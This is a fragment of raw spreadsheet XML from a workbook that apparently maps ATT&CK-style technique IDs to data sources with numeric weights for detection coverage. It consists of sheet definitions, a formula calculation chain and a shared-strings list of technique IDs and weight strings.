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omerus\Desktop\attackdatamap\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <bookViews>
    <workbookView xWindow="0" yWindow="0" windowWidth="14370" windowHeight="11475"/>
  </bookViews>
  <sheets>
    <sheet name="DataSourceEvents" sheetId="1" r:id="rId1"/>
    <sheet name="RatingLegend" sheetId="3" r:id="rId2"/>
    <sheet name="Knowledge base" sheetId="7" r:id="rId3"/>
    <sheet name="TechniqueDataSourceWeights" sheetId="2" r:id="rId4"/>
    <sheet name="REF-DataSources" sheetId="5" r:id="rId5"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="3" hidden="1">TechniqueDataSourceWeights!$A$2:$G$224</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7" i="1" l="1"/>
  <c r="E225" i="2"/>
  <c r="E226" i="2"/>
  <c r="E227" i="2"/>
  <c r="E228" i="2"/>
  <c r="E229" i="2"/>
  <c r="E230" i="2"/>
  <c r="E231" i="2"/>
  <c r="E232" i="2"/>
  <c r="E233" i="2"/>
  <c r="E234" i="2"/>
  <c r="E235" i="2"/>
  <c r="E236" i="2"/>
  <c r="E237" i="2"/>
  <c r="E238" i="2"/>
  <c r="E239" i="2"/>
  <c r="E240" i="2"/>
  <c r="E241" i="2"/>
  <c r="E242" i="2"/>
  <c r="E243" i="2"/>
  <c r="E244" i="2"/>
  <c r="E245" i="2"/>
  <c r="D226" i="2"/>
  <c r="D228" i="2"/>
  <c r="D230" i="2"/>
  <c r="D232" i="2"/>
  <c r="D234" i="2"/>
  <c r="D236" i="2"/>
  <c r="D238" i="2"/>
  <c r="D240" i="2"/>
  <c r="D242" i="2"/>
  <c r="D244" i="2"/>
  <c r="B225" i="2"/>
  <c r="D225" i="2" s="1"/>
  <c r="B226" i="2"/>
  <c r="B227" i="2"/>
  <c r="D227" i="2" s="1"/>
  <c r="B228" i="2"/>
  <c r="B229" i="2"/>
  <c r="D229" i="2" s="1"/>
  <c r="B230" i="2"/>
  <c r="B231" i="2"/>
  <c r="D231" i="2" s="1"/>
  <c r="B232" i="2"/>
  <c r="B233" i="2"/>
  <c r="D233" i="2" s="1"/>
  <c r="B234" i="2"/>
  <c r="B235" i="2"/>
  <c r="D235" i="2" s="1"/>
  <c r="B236" i="2"/>
  <c r="B237" i="2"/>
  <c r="D237" i="2" s="1"/>
  <c r="B238" i="2"/>
  <c r="B239" i="2"/>
  <c r="D239" i="2" s="1"/>
  <c r="B240" i="2"/>
  <c r="B241" i="2"/>
  <c r="D241" i="2" s="1"/>
  <c r="B242" i="2"/>
  <c r="B243" i="2"/>
  <c r="D243" i="2" s="1"/>
  <c r="B244" i="2"/>
  <c r="B245" i="2"/>
  <c r="D245" i="2" s="1"/>
  <c r="E224" i="2"/>
  <c r="D224" i="2"/>
  <c r="B224" i="2"/>
  <c r="E223" i="2"/>
  <c r="B223" i="2"/>
  <c r="D223" i="2" s="1"/>
  <c r="E222" i="2"/>
  <c r="B222" i="2"/>
  <c r="D222" i="2" s="1"/>
  <c r="E221" i="2"/>
  <c r="B221" i="2"/>
  <c r="D221" i="2" s="1"/>
  <c r="E220" i="2"/>
  <c r="D220" i="2"/>
  <c r="B220" i="2"/>
  <c r="E219" i="2"/>
  <c r="B219" i="2"/>
  <c r="D219" i="2" s="1"/>
  <c r="E218" i="2"/>
  <c r="B218" i="2"/>
  <c r="D218" i="2" s="1"/>
  <c r="E217" i="2"/>
  <c r="B217" i="2"/>
  <c r="D217" i="2" s="1"/>
  <c r="E216" i="2"/>
  <c r="D216" i="2"/>
  <c r="B216" i="2"/>
  <c r="E215" i="2"/>
  <c r="B215" i="2"/>
  <c r="D215" i="2" s="1"/>
  <c r="E214" i="2"/>
  <c r="B214" i="2"/>
  <c r="D214" i="2" s="1"/>
  <c r="E213" i="2"/>
  <c r="B213" i="2"/>
  <c r="D213" i="2" s="1"/>
  <c r="E212" i="2"/>
  <c r="D212" i="2"/>
  <c r="B212" i="2"/>
  <c r="E211" i="2"/>
  <c r="B211" i="2"/>
  <c r="D211" i="2" s="1"/>
  <c r="E210" i="2"/>
  <c r="B210" i="2"/>
  <c r="D210" i="2" s="1"/>
  <c r="E209" i="2"/>
  <c r="B209" i="2"/>
  <c r="D209" i="2" s="1"/>
  <c r="E208" i="2"/>
  <c r="D208" i="2"/>
  <c r="B208" i="2"/>
  <c r="E207" i="2"/>
  <c r="B207" i="2"/>
  <c r="D207" i="2" s="1"/>
  <c r="E206" i="2"/>
  <c r="B206" i="2"/>
  <c r="D206" i="2" s="1"/>
  <c r="E205" i="2"/>
  <c r="B205" i="2"/>
  <c r="D205" i="2" s="1"/>
  <c r="E204" i="2"/>
  <c r="D204" i="2"/>
  <c r="B204" i="2"/>
  <c r="E203" i="2"/>
  <c r="B203" i="2"/>
  <c r="D203" i="2" s="1"/>
  <c r="E202" i="2"/>
  <c r="B202" i="2"/>
  <c r="D202" i="2" s="1"/>
  <c r="E201" i="2"/>
  <c r="B201" i="2"/>
  <c r="D201" i="2" s="1"/>
  <c r="E200" i="2"/>
  <c r="D200" i="2"/>
  <c r="B200" i="2"/>
  <c r="E199" i="2"/>
  <c r="B199" i="2"/>
  <c r="D199" i="2" s="1"/>
  <c r="E198" i="2"/>
  <c r="B198" i="2"/>
  <c r="D198" i="2" s="1"/>
  <c r="E197" i="2"/>
  <c r="B197" i="2"/>
  <c r="D197" i="2" s="1"/>
  <c r="E196" i="2"/>
  <c r="D196" i="2"/>
  <c r="B196" i="2"/>
  <c r="E195" i="2"/>
  <c r="B195" i="2"/>
  <c r="D195" i="2" s="1"/>
  <c r="E194" i="2"/>
  <c r="B194" i="2"/>
  <c r="D194" i="2" s="1"/>
  <c r="E193" i="2"/>
  <c r="B193" i="2"/>
  <c r="D193" i="2" s="1"/>
  <c r="E192" i="2"/>
  <c r="D192" i="2"/>
  <c r="B192" i="2"/>
  <c r="E191" i="2"/>
  <c r="B191" i="2"/>
  <c r="D191" i="2" s="1"/>
  <c r="E190" i="2"/>
  <c r="B190" i="2"/>
  <c r="D190" i="2" s="1"/>
  <c r="E189" i="2"/>
  <c r="B189" i="2"/>
  <c r="D189" i="2" s="1"/>
  <c r="E188" i="2"/>
  <c r="D188" i="2"/>
  <c r="B188" i="2"/>
  <c r="E187" i="2"/>
  <c r="B187" i="2"/>
  <c r="D187" i="2" s="1"/>
  <c r="E186" i="2"/>
  <c r="B186" i="2"/>
  <c r="D186" i="2" s="1"/>
  <c r="E185" i="2"/>
  <c r="B185" i="2"/>
  <c r="D185" i="2" s="1"/>
  <c r="E184" i="2"/>
  <c r="D184" i="2"/>
  <c r="B184" i="2"/>
  <c r="E183" i="2"/>
  <c r="B183" i="2"/>
  <c r="D183" i="2" s="1"/>
  <c r="E182" i="2"/>
  <c r="B182" i="2"/>
  <c r="D182" i="2" s="1"/>
  <c r="E181" i="2"/>
  <c r="B181" i="2"/>
  <c r="D181" i="2" s="1"/>
  <c r="E180" i="2"/>
  <c r="D180" i="2"/>
  <c r="B180" i="2"/>
  <c r="E179" i="2"/>
  <c r="B179" i="2"/>
  <c r="D179" i="2" s="1"/>
  <c r="E178" i="2"/>
  <c r="B178" i="2"/>
  <c r="D178" i="2" s="1"/>
  <c r="E177" i="2"/>
  <c r="B177" i="2"/>
  <c r="D177" i="2" s="1"/>
  <c r="E176" i="2"/>
  <c r="D176" i="2"/>
  <c r="B176" i="2"/>
  <c r="E175" i="2"/>
  <c r="B175" i="2"/>
  <c r="D175" i="2" s="1"/>
  <c r="E174" i="2"/>
  <c r="B174" i="2"/>
  <c r="D174" i="2" s="1"/>
  <c r="E173" i="2"/>
  <c r="B173" i="2"/>
  <c r="D173" i="2" s="1"/>
  <c r="E172" i="2"/>
  <c r="D172" i="2"/>
  <c r="B172" i="2"/>
  <c r="E171" i="2"/>
  <c r="B171" i="2"/>
  <c r="D171" i="2" s="1"/>
  <c r="E170" i="2"/>
  <c r="B170" i="2"/>
  <c r="D170" i="2" s="1"/>
  <c r="E169" i="2"/>
  <c r="B169" i="2"/>
  <c r="D169" i="2" s="1"/>
  <c r="E168" i="2"/>
  <c r="D168" i="2"/>
  <c r="B168" i="2"/>
  <c r="E167" i="2"/>
  <c r="B167" i="2"/>
  <c r="D167" i="2" s="1"/>
  <c r="E166" i="2"/>
  <c r="B166" i="2"/>
  <c r="D166" i="2" s="1"/>
  <c r="E165" i="2"/>
  <c r="B165" i="2"/>
  <c r="D165" i="2" s="1"/>
  <c r="E164" i="2"/>
  <c r="D164" i="2"/>
  <c r="B164" i="2"/>
  <c r="E163" i="2"/>
  <c r="B163" i="2"/>
  <c r="D163" i="2" s="1"/>
  <c r="E162" i="2"/>
  <c r="B162" i="2"/>
  <c r="D162" i="2" s="1"/>
  <c r="E161" i="2"/>
  <c r="B161" i="2"/>
  <c r="D161" i="2" s="1"/>
  <c r="E160" i="2"/>
  <c r="D160" i="2"/>
  <c r="B160" i="2"/>
  <c r="E159" i="2"/>
  <c r="B159" i="2"/>
  <c r="D159" i="2" s="1"/>
  <c r="E158" i="2"/>
  <c r="B158" i="2"/>
  <c r="D158" i="2" s="1"/>
  <c r="E157" i="2"/>
  <c r="B157" i="2"/>
  <c r="D157" i="2" s="1"/>
  <c r="E156" i="2"/>
  <c r="D156" i="2"/>
  <c r="B156" i="2"/>
  <c r="E155" i="2"/>
  <c r="B155" i="2"/>
  <c r="D155" i="2" s="1"/>
  <c r="E154" i="2"/>
  <c r="B154" i="2"/>
  <c r="D154" i="2" s="1"/>
  <c r="E153" i="2"/>
  <c r="B153" i="2"/>
  <c r="D153" i="2" s="1"/>
  <c r="E152" i="2"/>
  <c r="D152" i="2"/>
  <c r="B152" i="2"/>
  <c r="E151" i="2"/>
  <c r="B151" i="2"/>
  <c r="D151" i="2" s="1"/>
  <c r="E150" i="2"/>
  <c r="B150" i="2"/>
  <c r="D150" i="2" s="1"/>
  <c r="E149" i="2"/>
  <c r="B149" i="2"/>
  <c r="D149" i="2" s="1"/>
  <c r="E148" i="2"/>
  <c r="D148" i="2"/>
  <c r="B148" i="2"/>
  <c r="E147" i="2"/>
  <c r="B147" i="2"/>
  <c r="D147" i="2" s="1"/>
  <c r="E146" i="2"/>
  <c r="B146" i="2"/>
  <c r="D146" i="2" s="1"/>
  <c r="E145" i="2"/>
  <c r="B145" i="2"/>
  <c r="D145" i="2" s="1"/>
  <c r="E144" i="2"/>
  <c r="D144" i="2"/>
  <c r="B144" i="2"/>
  <c r="E143" i="2"/>
  <c r="B143" i="2"/>
  <c r="D143" i="2" s="1"/>
  <c r="E142" i="2"/>
  <c r="B142" i="2"/>
  <c r="D142" i="2" s="1"/>
  <c r="E141" i="2"/>
  <c r="B141" i="2"/>
  <c r="D141" i="2" s="1"/>
  <c r="E140" i="2"/>
  <c r="D140" i="2"/>
  <c r="B140" i="2"/>
  <c r="E139" i="2"/>
  <c r="B139" i="2"/>
  <c r="D139" i="2" s="1"/>
  <c r="E138" i="2"/>
  <c r="B138" i="2"/>
  <c r="D138" i="2" s="1"/>
  <c r="E137" i="2"/>
  <c r="B137" i="2"/>
  <c r="D137" i="2" s="1"/>
  <c r="E136" i="2"/>
  <c r="D136" i="2"/>
  <c r="B136" i="2"/>
  <c r="E135" i="2"/>
  <c r="B135" i="2"/>
  <c r="D135" i="2" s="1"/>
  <c r="E134" i="2"/>
  <c r="B134" i="2"/>
  <c r="D134" i="2" s="1"/>
  <c r="E133" i="2"/>
  <c r="B133" i="2"/>
  <c r="D133" i="2" s="1"/>
  <c r="E132" i="2"/>
  <c r="D132" i="2"/>
  <c r="B132" i="2"/>
  <c r="E131" i="2"/>
  <c r="B131" i="2"/>
  <c r="D131" i="2" s="1"/>
  <c r="E130" i="2"/>
  <c r="B130" i="2"/>
  <c r="D130" i="2" s="1"/>
  <c r="E129" i="2"/>
  <c r="B129" i="2"/>
  <c r="D129" i="2" s="1"/>
  <c r="E128" i="2"/>
  <c r="D128" i="2"/>
  <c r="B128" i="2"/>
  <c r="E127" i="2"/>
  <c r="B127" i="2"/>
  <c r="D127" i="2" s="1"/>
  <c r="E126" i="2"/>
  <c r="B126" i="2"/>
  <c r="D126" i="2" s="1"/>
  <c r="E125" i="2"/>
  <c r="B125" i="2"/>
  <c r="D125" i="2" s="1"/>
  <c r="E124" i="2"/>
  <c r="D124" i="2"/>
  <c r="B124" i="2"/>
  <c r="E123" i="2"/>
  <c r="B123" i="2"/>
  <c r="D123" i="2" s="1"/>
  <c r="E122" i="2"/>
  <c r="B122" i="2"/>
  <c r="D122" i="2" s="1"/>
  <c r="E121" i="2"/>
  <c r="B121" i="2"/>
  <c r="D121" i="2" s="1"/>
  <c r="E120" i="2"/>
  <c r="D120" i="2"/>
  <c r="B120" i="2"/>
  <c r="E119" i="2"/>
  <c r="B119" i="2"/>
  <c r="D119" i="2" s="1"/>
  <c r="E118" i="2"/>
  <c r="B118" i="2"/>
  <c r="D118" i="2" s="1"/>
  <c r="E117" i="2"/>
  <c r="B117" i="2"/>
  <c r="D117" i="2" s="1"/>
  <c r="E116" i="2"/>
  <c r="D116" i="2"/>
  <c r="B116" i="2"/>
  <c r="E115" i="2"/>
  <c r="B115" i="2"/>
  <c r="D115" i="2" s="1"/>
  <c r="E114" i="2"/>
  <c r="B114" i="2"/>
  <c r="D114" i="2" s="1"/>
  <c r="E113" i="2"/>
  <c r="B113" i="2"/>
  <c r="D113" i="2" s="1"/>
  <c r="E112" i="2"/>
  <c r="D112" i="2"/>
  <c r="B112" i="2"/>
  <c r="E111" i="2"/>
  <c r="B111" i="2"/>
  <c r="D111" i="2" s="1"/>
  <c r="E110" i="2"/>
  <c r="B110" i="2"/>
  <c r="D110" i="2" s="1"/>
  <c r="E109" i="2"/>
  <c r="B109" i="2"/>
  <c r="D109" i="2" s="1"/>
  <c r="E108" i="2"/>
  <c r="D108" i="2"/>
  <c r="B108" i="2"/>
  <c r="E107" i="2"/>
  <c r="B107" i="2"/>
  <c r="D107" i="2" s="1"/>
  <c r="E106" i="2"/>
  <c r="B106" i="2"/>
  <c r="D106" i="2" s="1"/>
  <c r="E105" i="2"/>
  <c r="B105" i="2"/>
  <c r="D105" i="2" s="1"/>
  <c r="E104" i="2"/>
  <c r="D104" i="2"/>
  <c r="B104" i="2"/>
  <c r="E103" i="2"/>
  <c r="B103" i="2"/>
  <c r="D103" i="2" s="1"/>
  <c r="E102" i="2"/>
  <c r="B102" i="2"/>
  <c r="D102" i="2" s="1"/>
  <c r="E101" i="2"/>
  <c r="B101" i="2"/>
  <c r="D101" i="2" s="1"/>
  <c r="E100" i="2"/>
  <c r="D100" i="2"/>
  <c r="B100" i="2"/>
  <c r="E99" i="2"/>
  <c r="B99" i="2"/>
  <c r="D99" i="2" s="1"/>
  <c r="E98" i="2"/>
  <c r="B98" i="2"/>
  <c r="D98" i="2" s="1"/>
  <c r="E97" i="2"/>
  <c r="B97" i="2"/>
  <c r="D97" i="2" s="1"/>
  <c r="E96" i="2"/>
  <c r="D96" i="2"/>
  <c r="B96" i="2"/>
  <c r="E95" i="2"/>
  <c r="B95" i="2"/>
  <c r="D95" i="2" s="1"/>
  <c r="E94" i="2"/>
  <c r="B94" i="2"/>
  <c r="D94" i="2" s="1"/>
  <c r="E93" i="2"/>
  <c r="B93" i="2"/>
  <c r="D93" i="2" s="1"/>
  <c r="E92" i="2"/>
  <c r="D92" i="2"/>
  <c r="B92" i="2"/>
  <c r="E91" i="2"/>
  <c r="B91" i="2"/>
  <c r="D91" i="2" s="1"/>
  <c r="E90" i="2"/>
  <c r="B90" i="2"/>
  <c r="D90" i="2" s="1"/>
  <c r="E89" i="2"/>
  <c r="B89" i="2"/>
  <c r="D89" i="2" s="1"/>
  <c r="E88" i="2"/>
  <c r="D88" i="2"/>
  <c r="B88" i="2"/>
  <c r="E87" i="2"/>
  <c r="B87" i="2"/>
  <c r="D87" i="2" s="1"/>
  <c r="E86" i="2"/>
  <c r="B86" i="2"/>
  <c r="D86" i="2" s="1"/>
  <c r="E85" i="2"/>
  <c r="B85" i="2"/>
  <c r="D85" i="2" s="1"/>
  <c r="E84" i="2"/>
  <c r="D84" i="2"/>
  <c r="B84" i="2"/>
  <c r="E83" i="2"/>
  <c r="B83" i="2"/>
  <c r="D83" i="2" s="1"/>
  <c r="E82" i="2"/>
  <c r="B82" i="2"/>
  <c r="D82" i="2" s="1"/>
  <c r="E81" i="2"/>
  <c r="B81" i="2"/>
  <c r="D81" i="2" s="1"/>
  <c r="E80" i="2"/>
  <c r="D80" i="2"/>
  <c r="B80" i="2"/>
  <c r="E79" i="2"/>
  <c r="B79" i="2"/>
  <c r="D79" i="2" s="1"/>
  <c r="E78" i="2"/>
  <c r="B78" i="2"/>
  <c r="D78" i="2" s="1"/>
  <c r="E77" i="2"/>
  <c r="B77" i="2"/>
  <c r="D77" i="2" s="1"/>
  <c r="E76" i="2"/>
  <c r="D76" i="2"/>
  <c r="B76" i="2"/>
  <c r="E75" i="2"/>
  <c r="B75" i="2"/>
  <c r="D75" i="2" s="1"/>
  <c r="E74" i="2"/>
  <c r="B74" i="2"/>
  <c r="D74" i="2" s="1"/>
  <c r="E73" i="2"/>
  <c r="B73" i="2"/>
  <c r="D73" i="2" s="1"/>
  <c r="E72" i="2"/>
  <c r="D72" i="2"/>
  <c r="B72" i="2"/>
  <c r="E71" i="2"/>
  <c r="B71" i="2"/>
  <c r="D71" i="2" s="1"/>
  <c r="E70" i="2"/>
  <c r="B70" i="2"/>
  <c r="D70" i="2" s="1"/>
  <c r="E69" i="2"/>
  <c r="B69" i="2"/>
  <c r="D69" i="2" s="1"/>
  <c r="E68" i="2"/>
  <c r="D68" i="2"/>
  <c r="B68" i="2"/>
  <c r="E67" i="2"/>
  <c r="B67" i="2"/>
  <c r="D67" i="2" s="1"/>
  <c r="E66" i="2"/>
  <c r="B66" i="2"/>
  <c r="D66" i="2" s="1"/>
  <c r="E65" i="2"/>
  <c r="B65" i="2"/>
  <c r="D65" i="2" s="1"/>
  <c r="E64" i="2"/>
  <c r="D64" i="2"/>
  <c r="B64" i="2"/>
  <c r="E63" i="2"/>
  <c r="B63" i="2"/>
  <c r="D63" i="2" s="1"/>
  <c r="E62" i="2"/>
  <c r="B62" i="2"/>
  <c r="D62" i="2" s="1"/>
  <c r="E61" i="2"/>
  <c r="B61" i="2"/>
  <c r="D61" i="2" s="1"/>
  <c r="E60" i="2"/>
  <c r="D60" i="2"/>
  <c r="B60" i="2"/>
  <c r="E59" i="2"/>
  <c r="B59" i="2"/>
  <c r="D59" i="2" s="1"/>
  <c r="E58" i="2"/>
  <c r="B58" i="2"/>
  <c r="D58" i="2" s="1"/>
  <c r="E57" i="2"/>
  <c r="B57" i="2"/>
  <c r="D57" i="2" s="1"/>
  <c r="E56" i="2"/>
  <c r="D56" i="2"/>
  <c r="B56" i="2"/>
  <c r="E55" i="2"/>
  <c r="B55" i="2"/>
  <c r="D55" i="2" s="1"/>
  <c r="E54" i="2"/>
  <c r="B54" i="2"/>
  <c r="D54" i="2" s="1"/>
  <c r="E53" i="2"/>
  <c r="B53" i="2"/>
  <c r="D53" i="2" s="1"/>
  <c r="E52" i="2"/>
  <c r="B52" i="2"/>
  <c r="D52" i="2" s="1"/>
  <c r="E51" i="2"/>
  <c r="D51" i="2"/>
  <c r="B51" i="2"/>
  <c r="E50" i="2"/>
  <c r="B50" i="2"/>
  <c r="D50" i="2" s="1"/>
  <c r="E49" i="2"/>
  <c r="B49" i="2"/>
  <c r="D49" i="2" s="1"/>
  <c r="E48" i="2"/>
  <c r="B48" i="2"/>
  <c r="D48" i="2" s="1"/>
  <c r="E47" i="2"/>
  <c r="D47" i="2"/>
  <c r="B47" i="2"/>
  <c r="E46" i="2"/>
  <c r="B46" i="2"/>
  <c r="D46" i="2" s="1"/>
  <c r="E45" i="2"/>
  <c r="B45" i="2"/>
  <c r="D45" i="2" s="1"/>
  <c r="E44" i="2"/>
  <c r="B44" i="2"/>
  <c r="D44" i="2" s="1"/>
  <c r="E43" i="2"/>
  <c r="D43" i="2"/>
  <c r="B43" i="2"/>
  <c r="E42" i="2"/>
  <c r="B42" i="2"/>
  <c r="D42" i="2" s="1"/>
  <c r="E41" i="2"/>
  <c r="B41" i="2"/>
  <c r="D41" i="2" s="1"/>
  <c r="E40" i="2"/>
  <c r="B40" i="2"/>
  <c r="D40" i="2" s="1"/>
  <c r="E39" i="2"/>
  <c r="D39" i="2"/>
  <c r="B39" i="2"/>
  <c r="E38" i="2"/>
  <c r="B38" i="2"/>
  <c r="D38" i="2" s="1"/>
  <c r="E37" i="2"/>
  <c r="B37" i="2"/>
  <c r="D37" i="2" s="1"/>
  <c r="E36" i="2"/>
  <c r="B36" i="2"/>
  <c r="D36" i="2" s="1"/>
  <c r="E35" i="2"/>
  <c r="D35" i="2"/>
  <c r="B35" i="2"/>
  <c r="E34" i="2"/>
  <c r="B34" i="2"/>
  <c r="D34" i="2" s="1"/>
  <c r="E33" i="2"/>
  <c r="B33" i="2"/>
  <c r="D33" i="2" s="1"/>
  <c r="E32" i="2"/>
  <c r="B32" i="2"/>
  <c r="D32" i="2" s="1"/>
  <c r="E31" i="2"/>
  <c r="D31" i="2"/>
  <c r="B31" i="2"/>
  <c r="E30" i="2"/>
  <c r="B30" i="2"/>
  <c r="D30" i="2" s="1"/>
  <c r="E29" i="2"/>
  <c r="B29" i="2"/>
  <c r="D29" i="2" s="1"/>
  <c r="E28" i="2"/>
  <c r="B28" i="2"/>
  <c r="D28" i="2" s="1"/>
  <c r="E27" i="2"/>
  <c r="D27" i="2"/>
  <c r="B27" i="2"/>
  <c r="E26" i="2"/>
  <c r="B26" i="2"/>
  <c r="D26" i="2" s="1"/>
  <c r="E25" i="2"/>
  <c r="B25" i="2"/>
  <c r="D25" i="2" s="1"/>
  <c r="E24" i="2"/>
  <c r="B24" i="2"/>
  <c r="D24" i="2" s="1"/>
  <c r="E23" i="2"/>
  <c r="D23" i="2"/>
  <c r="B23" i="2"/>
  <c r="E22" i="2"/>
  <c r="B22" i="2"/>
  <c r="D22" i="2" s="1"/>
  <c r="E21" i="2"/>
  <c r="B21" i="2"/>
  <c r="D21" i="2" s="1"/>
  <c r="E20" i="2"/>
  <c r="B20" i="2"/>
  <c r="D20" i="2" s="1"/>
  <c r="E19" i="2"/>
  <c r="D19" i="2"/>
  <c r="B19" i="2"/>
  <c r="E18" i="2"/>
  <c r="B18" i="2"/>
  <c r="D18" i="2" s="1"/>
  <c r="E17" i="2"/>
  <c r="B17" i="2"/>
  <c r="D17" i="2" s="1"/>
  <c r="E16" i="2"/>
  <c r="B16" i="2"/>
  <c r="D16" i="2" s="1"/>
  <c r="E15" i="2"/>
  <c r="D15" i="2"/>
  <c r="B15" i="2"/>
  <c r="E14" i="2"/>
  <c r="B14" i="2"/>
  <c r="D14" i="2" s="1"/>
  <c r="E13" i="2"/>
  <c r="B13" i="2"/>
  <c r="D13" i="2" s="1"/>
  <c r="E12" i="2"/>
  <c r="B12" i="2"/>
  <c r="D12" i="2" s="1"/>
  <c r="E11" i="2"/>
  <c r="D11" i="2"/>
  <c r="B11" i="2"/>
  <c r="E10" i="2"/>
  <c r="B10" i="2"/>
  <c r="D10" i="2" s="1"/>
  <c r="E9" i="2"/>
  <c r="B9" i="2"/>
  <c r="D9" i="2" s="1"/>
  <c r="E8" i="2"/>
  <c r="B8" i="2"/>
  <c r="D8" i="2" s="1"/>
  <c r="E7" i="2"/>
  <c r="D7" i="2"/>
  <c r="B7" i="2"/>
  <c r="E6" i="2"/>
  <c r="B6" i="2"/>
  <c r="D6" i="2" s="1"/>
  <c r="E5" i="2"/>
  <c r="B5" i="2"/>
  <c r="D5" i="2" s="1"/>
  <c r="E4" i="2"/>
  <c r="B4" i="2"/>
  <c r="D4" i="2" s="1"/>
  <c r="E3" i="2"/>
  <c r="D3" i="2"/>
  <c r="B3" i="2"/>
  <c r="G2" i="2"/>
  <c r="E2" i="2"/>
  <c r="D2" i="2"/>
  <c r="B2" i="2"/>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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="2782" uniqueCount="1510">
  <si>
    <t>ID</t>
  </si>
  <si>
    <t>Data Source</t>
  </si>
  <si>
    <t>Weight</t>
  </si>
  <si>
    <t>Datasources</t>
  </si>
  <si>
    <t>Weights</t>
  </si>
  <si>
    <t xml:space="preserve"> </t>
  </si>
  <si>
    <t>Items in Refence vs Items in this sheet</t>
  </si>
  <si>
    <t>T1001</t>
  </si>
  <si>
    <t>25;25;25;25</t>
  </si>
  <si>
    <t>T1002</t>
  </si>
  <si>
    <t>20;20;30;30</t>
  </si>
  <si>
    <t>T1003</t>
  </si>
  <si>
    <t>T1004</t>
  </si>
  <si>
    <t>50;20;30</t>
  </si>
  <si>
    <t>T1005</t>
  </si>
  <si>
    <t>35;30;35</t>
  </si>
  <si>
    <t>T1006</t>
  </si>
  <si>
    <t>T1007</t>
  </si>
  <si>
    <t>40;60</t>
  </si>
  <si>
    <t>T1008</t>
  </si>
  <si>
    <t>15;23;22;15;25</t>
  </si>
  <si>
    <t>T1009</t>
  </si>
  <si>
    <t>33;34;33</t>
  </si>
  <si>
    <t>T1010</t>
  </si>
  <si>
    <t>35;25;40</t>
  </si>
  <si>
    <t>T1011</t>
  </si>
  <si>
    <t>49;51</t>
  </si>
  <si>
    <t>T1012</t>
  </si>
  <si>
    <t>30;20;50</t>
  </si>
  <si>
    <t>T1013</t>
  </si>
  <si>
    <t>20;20;20;20;20</t>
  </si>
  <si>
    <t>T1014</t>
  </si>
  <si>
    <t>20;40;40</t>
  </si>
  <si>
    <t>T1015</t>
  </si>
  <si>
    <t>40;30;30</t>
  </si>
  <si>
    <t>T1016</t>
  </si>
  <si>
    <t>T1017</t>
  </si>
  <si>
    <t>35;35;30</t>
  </si>
  <si>
    <t>T1018</t>
  </si>
  <si>
    <t>30;20;25;25</t>
  </si>
  <si>
    <t>T1019</t>
  </si>
  <si>
    <t>33;33;34</t>
  </si>
  <si>
    <t>T1020</t>
  </si>
  <si>
    <t>T1021</t>
  </si>
  <si>
    <t>T1022</t>
  </si>
  <si>
    <t>40;15;25;20</t>
  </si>
  <si>
    <t>T1023</t>
  </si>
  <si>
    <t>T1024</t>
  </si>
  <si>
    <t>T1025</t>
  </si>
  <si>
    <t>T1026</t>
  </si>
  <si>
    <t>T1027</t>
  </si>
  <si>
    <t>8;8;8;8;8;9;10;8;9;8;8;8</t>
  </si>
  <si>
    <t>T1028</t>
  </si>
  <si>
    <t>15;20;20;20;25</t>
  </si>
  <si>
    <t>T1029</t>
  </si>
  <si>
    <t>T1030</t>
  </si>
  <si>
    <t>30;30;20;20</t>
  </si>
  <si>
    <t>T1031</t>
  </si>
  <si>
    <t>30;20;20;30</t>
  </si>
  <si>
    <t>T1032</t>
  </si>
  <si>
    <t>20;15;15;15;15;20</t>
  </si>
  <si>
    <t>T1033</t>
  </si>
  <si>
    <t>25;25;50</t>
  </si>
  <si>
    <t>T1034</t>
  </si>
  <si>
    <t>T1035</t>
  </si>
  <si>
    <t>T1036</t>
  </si>
  <si>
    <t>T1037</t>
  </si>
  <si>
    <t>45;55</t>
  </si>
  <si>
    <t>T1038</t>
  </si>
  <si>
    <t>T1039</t>
  </si>
  <si>
    <t>40;20;40</t>
  </si>
  <si>
    <t>T1040</t>
  </si>
  <si>
    <t>30;30;15;25</t>
  </si>
  <si>
    <t>T1041</t>
  </si>
  <si>
    <t>30;70</t>
  </si>
  <si>
    <t>T1042</t>
  </si>
  <si>
    <t>T1043</t>
  </si>
  <si>
    <t>30;30;30;10</t>
  </si>
  <si>
    <t>T1044</t>
  </si>
  <si>
    <t>T1045</t>
  </si>
  <si>
    <t>T1046</t>
  </si>
  <si>
    <t>T1047</t>
  </si>
  <si>
    <t>T1048</t>
  </si>
  <si>
    <t>10;15;20;15;20;20</t>
  </si>
  <si>
    <t>T1049</t>
  </si>
  <si>
    <t>35;65</t>
  </si>
  <si>
    <t>T1050</t>
  </si>
  <si>
    <t>T1051</t>
  </si>
  <si>
    <t>T1052</t>
  </si>
  <si>
    <t>60;40</t>
  </si>
  <si>
    <t>T1053</t>
  </si>
  <si>
    <t>10;20;35;35</t>
  </si>
  <si>
    <t>T1054</t>
  </si>
  <si>
    <t>40;35;25</t>
  </si>
  <si>
    <t>T1055</t>
  </si>
  <si>
    <t>16;16;16;17;18;17</t>
  </si>
  <si>
    <t>T1056</t>
  </si>
  <si>
    <t>20;30;30;20</t>
  </si>
  <si>
    <t>T1057</t>
  </si>
  <si>
    <t>T1058</t>
  </si>
  <si>
    <t>30;30;40</t>
  </si>
  <si>
    <t>T1059</t>
  </si>
  <si>
    <t>T1060</t>
  </si>
  <si>
    <t>70;30</t>
  </si>
  <si>
    <t>T1061</t>
  </si>
  <si>
    <t>T1062</t>
  </si>
  <si>
    <t>T1063</t>
  </si>
  <si>
    <t>25;35;40</t>
  </si>
  <si>
    <t>T1064</t>
  </si>
  <si>
    <t>33;30;37</t>
  </si>
  <si>
    <t>T1065</t>
  </si>
  <si>
    <t>T1066</t>
  </si>
  <si>
    <t>T1067</t>
  </si>
  <si>
    <t>45;35;20</t>
  </si>
  <si>
    <t>T1068</t>
  </si>
  <si>
    <t>30;40;30</t>
  </si>
  <si>
    <t>T1069</t>
  </si>
  <si>
    <t>T1070</t>
  </si>
  <si>
    <t>T1071</t>
  </si>
  <si>
    <t>15;30;25;15;15</t>
  </si>
  <si>
    <t>T1072</t>
  </si>
  <si>
    <t>10;15;20;20;15;10</t>
  </si>
  <si>
    <t>T1073</t>
  </si>
  <si>
    <t>T1074</t>
  </si>
  <si>
    <t>T1075</t>
  </si>
  <si>
    <t>T1076</t>
  </si>
  <si>
    <t>T1077</t>
  </si>
  <si>
    <t>25;35;15;25</t>
  </si>
  <si>
    <t>T1078</t>
